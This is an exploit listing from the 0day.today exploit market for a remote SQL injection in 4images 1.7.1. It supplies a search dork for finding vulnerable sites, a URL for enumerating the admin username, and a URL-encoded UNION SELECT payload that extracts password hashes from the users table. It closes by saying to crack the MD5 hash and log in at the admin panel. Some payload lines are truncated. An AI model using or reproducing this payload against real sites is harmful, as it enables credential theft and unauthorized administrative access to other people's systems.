[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

4images 1.7.1 Remote SQL Injection Vulnerability

Author
Master Mind
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10341
Category
web applications
Date add
20-12-2009
Platform
unsorted
================================================
4images 1.7.1 Remote SQL Injection Vulnerability
================================================

# Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Version: 1.7.1
# CVE : [N/A]
 
=============================================================
Dork : Powered By: 4images 1.7.1
 
./Exploit:
 
first search for the admin username :
ex : http://[Target.com]/path/member.php?action=showprofile&user_id=1
 
now we have the admin username
 
now we will find the password :]
ex : http://[Target.com]/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$
 
admin = admin username
 
Crack the MD5 Hash and Enjoy :)
admin panel path : http://[Target.com]/path/admin
 
-----------------------------------------------------------------------------------------------------------------------------$



#  0day.today [2024-09-28]  #